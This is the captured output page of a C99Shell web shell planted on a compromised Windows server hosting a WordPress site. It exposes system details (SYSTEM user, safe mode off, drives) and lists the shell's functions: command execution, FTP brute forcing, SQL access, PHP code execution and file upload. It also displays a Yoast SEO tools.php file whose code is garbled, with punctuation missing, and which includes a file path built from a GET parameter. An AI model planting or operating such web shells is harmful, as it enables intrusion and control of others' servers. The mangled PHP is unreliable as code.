!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wordpress-seo\admin\pages\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tools.php (1.77 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin
 */

if ( ! defined'WPSEO_VERSION' ) ) {
    
header'Status: 403 Forbidden' );
    
header'HTTP/1.1 403 Forbidden' );
    exit();
}

$tool_page = (string) filter_inputINPUT_GET'tool' );

$yform Yoast_Form::get_instance();

$yform->admin_headerfalse );

if ( 
'' === $tool_page ) {
    
$tools = array(
        
'bulk-editor' => array(
            
'title' => __'Bulk editor''wordpress-seo' ),
            
'desc' => __'This tool allows you to quickly change titles and descriptions of your posts and pages without having to go into the editor for each page.''wordpress-seo' ),
        ),
        
'import-export' => array(
            
'title' => __'Import and Export''wordpress-seo' ),
            
'desc' => __'Import settings from other SEO plugins and export your settings for re-use on (another) blog.''wordpress-seo' ),
        ),
    );
    if ( 
WPSEO_Utils::allow_system_file_edit() === true && ! is_multisite() ) {
        
$tools['file-editor'] = array(
            
'title' => __'File editor''wordpress-seo' ),
            
'desc' => __'This tool allows you to quickly change important files for your SEO, like your robots.txt and, if you have one, your .htaccess file.''wordpress-seo' ),
        );
    }

    echo 
'<p>'__'WordPress SEO by Yoast comes with some very powerful built-in tools:''wordpress-seo' ), '</p>';

    
asort$tools );

    echo 
'<ul class="ul-disc">';
    foreach ( 
$tools as $slug => $tool ) {
        echo 
'<li>';
        echo 
'<strong><a href="'admin_url'admin.php?page=wpseo_tools&tool=' $slug ), '">'$tool['title'], '</a></strong><br/>';
        echo 
$tool['desc'];
        echo 
'</li>';
    }
    echo 
'</ul>';

}
else {
    echo 
'<a href="'admin_url'admin.php?page=wpseo_tools' ), '">'__'&laquo; Back to Tools page''wordpress-seo' ), '</a>';
    require_once 
WPSEO_PATH 'admin/views/tool-' $tool_page '.php';
}

$yform->admin_footerfalse );

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--